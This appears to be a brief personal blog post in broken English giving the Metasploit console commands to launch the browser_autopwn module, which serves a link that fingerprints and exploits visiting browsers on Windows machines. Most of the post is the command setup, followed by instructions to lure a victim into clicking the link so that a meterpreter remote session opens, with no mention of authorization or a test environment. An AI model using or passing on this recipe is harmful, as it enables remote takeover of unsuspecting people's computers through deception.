Today I discovered a new things in my penetration testing that I just before I wrote this updates.I not sure if this exploit it rather new nor old but seem it works with windows machines.
As I used an auxiliary module to done the task.This module will create a URL/Links and you need to lure your victim to click the said link created upon exploit execution.Below is the setup needed to be done and I sorry this time Im not publishing the videos.
p/s : This module uses a combination of client-side and server-side
techniques to fingerprint HTTP clients and then automatically
exploit them.
========================================
msf>use auxiliary/server/browser_autopwn
set LHOST < Your Local IP >
set SRVHOST < Your Local IP >
set SRVPORT < 80 >
Set URIPATH < / > <--- default is random
exploit
wait till it finish loading and creating the said URL/Link
lure victim to click the said IP and ...
EUREKA!
A meterpreter sessions will establish
======================================
Happy trying.. :)
No comments:
Post a Comment